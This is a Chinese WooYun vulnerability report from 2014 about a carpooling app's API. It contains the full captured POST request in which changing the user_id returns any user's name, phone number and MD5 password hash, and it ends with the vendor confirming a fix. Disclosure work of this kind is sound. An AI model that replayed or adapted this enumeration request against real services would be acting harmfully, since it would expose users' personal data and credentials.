当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-071437

漏洞标题:某拼车App设计漏洞可获取全部用户敏感信息

相关厂商:chepinhui.com

漏洞作者: 啊L川

提交时间:2014-08-08 10:30

修复时间:2014-09-22 10:32

公开时间:2014-09-22 10:32

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-08: 细节已通知厂商并且等待厂商处理中
2014-08-08: 厂商已经确认,细节仅向厂商公开
2014-08-18: 细节向核心白帽子及相关领域专家公开
2014-08-28: 细节向普通白帽子公开
2014-09-07: 细节向实习白帽子公开
2014-09-22: 细节向公众公开

简要描述:

没有设置相应得用户权限,可获取用户信息,用户名,手机号及md5的密码等敏感信息

详细说明:

刷微博呀 看到某大牛说了个非常牛X的APP --哈哈拼车
漏洞说明:可通过用户user_id 来遍历用户信息
证明过程:
注册账号 访问个人中心页面 通过工具 抓去请求

获取个人中心数据的为POST请求 
http://api3.chepinhui.com/api.php/request
POST数据
header=%7B%22app_version_type%22%3A%22iPhone%22%2C%22system_name%22%3A%22iPhone%20OS%22%2C%22app_id%22%3A%22com.hahapinche.haha%22%2C%22device_version%22%3A%22iPhone%205s%28GSM%29%22%2C%22device_identifier%22%3A%22C0448591-7AA5-4A40-975C-1F0425AC31A6%22%2C%22function_name%22%3A%22detail%22%2C%22version%22%3A%223.0%22%2C%22app_name%22%3A%22haha%22%2C%22system_version%22%3A%227.1.2%22%2C%22model%22%3A%22iPhone%22%2C%22name%22%3A%22iPhone5S-Xcar%22%2C%22device_time%22%3A%221407399153072%22%2C%22user_id%22%3A39114%2C%22hmac%22%3A%22cce9fa4467e435318a67a53a8553409b858ed6a7dc5f4617f8e34a23169772121f618091f0f7739047161a4b231c78098dfb4e2372eb4299b829c9e551266a75%22%2C%22action_name%22%3A%22User%22%7D&user_id=39114


通过遍历user_id 即可获取到用户信息

漏洞证明:

漏洞证明:

QQ20140807-3@2x.png


QQ20140807-4@2x.png


QQ20140807-5@2x.png

修复方案:

对user_id 加验证

版权声明:转载请注明来源 啊L川@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-08-08 11:00

厂商回复:

用户id的验证不严谨,已经修复,谢谢

最新状态:

暂无